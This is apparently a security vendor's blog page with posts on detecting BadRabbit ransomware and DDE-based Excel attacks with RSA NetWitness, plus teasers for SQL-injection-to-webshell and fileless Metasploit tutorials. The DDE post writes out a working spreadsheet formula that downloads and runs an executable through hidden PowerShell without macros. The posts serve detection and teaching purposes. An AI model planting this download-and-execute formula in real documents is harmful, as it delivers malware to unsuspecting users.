BadRabbit

BadRabbit is a new ransomware that has been spreading across Eastern Europe.

Once a machine is infected, the malware tries to spread laterally via SMB and by trying to dump passwords using mimikatz.

It will then encrypt documents on the local machine, modify the MBR and reboot the machine making it impossible to boot without paying the ransom.

 

The following are examples of the visibility an enterprise that has RSA NetWitness Endpoint and Packets would have when a machine gets infected.

 

1st, from the perspective of RSA NetWitness packets, it is possible to see the SMB traffic generated by the infected machine, trying to login using a set of hard coded usernames and passwords (full list available here: BadRabbit credential dictionary – Pastebin.com ).

netwitness-smb

 

From the perspective of RSA NetWitness Endpoint, we can see the following:

We can identify the modules part of the attack.

modules

– B4DD.tmp is a version of mimikatz to dump passwords using lsass.exe

– cscc.dat is a valid tool used for the encryption

– shutdown.exe is used by the malware to restart the machine

 

By analyzing those modules we can get bit more details.

For example, by analyzing dispci.exe we can see the extensions it looks for encryption:

extensions

As well as some of the encryption/decryption messages that would eventually popup to the user:

messages-discpci

 

If we then look  at the triggered IIOCs and behaviors:

iiocs

1- The malware is reading a large number of documents in a short period of time (typical ransomware behavior)

2- Reported as malicious by the reputation service (Reversing Labs)

 

If we want to look at more details for what has happened, we can look at the tracking data:

tracking1.PNG

1- the different modules needed by the malware are dropped to disk

2- it removes any previous tasks installed by the malware (notice the name of the tasks referencing the names of the dragons in Game of Thrones)

3- new scheduled tasks are added to run the encryption with the victim’s ID and then shutdown the machine

4- we then see B4DD.tmp (mimikatz) accessing lsass.exe to try and dump credentials

5- it then access all the documents with extensions that matches to get encrypted

 

tracking2

6- it then deletes logs and events

7- and finally removes/adds scheduled tasks to restart the machine

 

Once the machine gets restarted, the victim is not able to boot to Windows and gets the following message:

Capture

 

This shows how RSA NetWitness Packets and Endpoint can help get early notification and detection for new breeds of malware without relying on known signatures, and how they can be used to easily look for IOCs and indicators to quickly respond and identify compromised machines.

MS Excel Command Execution Without Macros

There has recently been a reappearance of a method used to execute commands via malicious Excel files (and other office documents) without the need of Macros.

The method uses Dynamic Data Exchange (DDE), and what makes it interesting is that, even though it does causes prompt messages to appear, it doesn’t use Macros and therefore it is less likely to be detected and blocked, and users are more likely to accept the prompts. In addition, as this is a “feature” and not a vulnerability, it is not something that will be patched, and cannot be easily prevented and blocked.

We will see how to perform a sample attack using DDE and then how easily it can be detected with RSA NetWitness Endpoint.

 

 

DDE Sample Attack

To execute a command using DDE, all we have to do is create an Excel file and use the following formula in one of the cells:

=cmd|’ /c notepad’!A0

Once the user opens the file and accepts the prompts, notepad.exe will be launched.

To make the attack more interesting, we want to use the same method in conjunction with PowerShell to download and execute our payload (the payload “YGH.exe” is hosted on the “192.168.1.3” server):

=cmd|’/c powershell.exe -w hidden (New-Object System.Net.WebClient).DownloadFile(\”http://192.168.1.3/YGH.exe\”,\”c:\\Users\Public\\YGH.exe\”);Start-Process \”c:\\Users\\Public\\YGH.exe\”‘!A0

 

Once the victim opens the file, this is what he sees:

 

After accepting the 1st warning message, he sees a 2nd warning:

 

And finally the payload gets downloaded and executed:

In a real life scenario, the malware would have done something more stealthy, or provided remote access to the attacker instead of displaying a message.

 

 

 

Detection Using RSA NetWitness Endpoint (EDR)

Now, from the RSA NetWitness Endpoint view, this would be detected very easily.

  1. IIOCs are triggered for Office running PowerShell and PowerShell downloading content. This could be used to generate real-time alerts via email and/or Syslog and get notified at an early stage of the attack.
  2. Excel is executed
  3. Excel launches “cmd.exe”. From the command arguments we can see that cmd is used to launch powershell to download and execute a file called “YGH.exe” from the “192.168.1.3” server.
  4. PowerShell saves the YGH.exe file to disk
  5. PowerShell executed the YGH.exe file

 

 

This shows how an attack vector that can easily bypass traditional preventive solutions can be detected by RSA NetWitness Endpoint based on the monitored behavior of the user’s workstation.

This has been detected even though Excel is an approved software with a valid trusted signature and the malware itself didn’t perform any malicious activity (it only shows a message to the victim). It demonstrates early detection capabilities based on behavior before negative impact actually happens.

From SQL Injection to WebShell

An SQL Injection attack is not only limited to dumping a database, but can also allow the attacker to upload files to the remote server and consequently gain remote access via a WebShell.

WebShells can receive commands from the attackers mainly using 2 methods:

  • based on GET requests, which can easily be detected through logs and SIEM solutions as the commands are visible in the URL
  • based on POST, which is a bit more stealthy as the commands are submitted in the payload and therefore not part of the logs

In this tutorial we will see how to:

  • use sqlmap to perform an SQL Injection attack
  • dump the database using sqlmap
  • use sqlmap to automatically provide WebShell access based on GET requests
  • use sqlmap to upload a custom and more advanced WebShell (b374k) which relies on POST

To test the SQL Injections, we will use the DVWA (Damn Vulnerable Web Application), which is a web application purposely built with vulnerabilities and weaknesses for pen-testing.

Continue reading

Fileless Infection Using Metasploit and PowerShell

Fileless malware is a method used to compromise a system without writing any file to disk. This allows to remain stealthy and avoid detection from some antiviruses, EPP and EDR solutions.

We will look at how to test this type of attack and then at ways to detect it.

Continue reading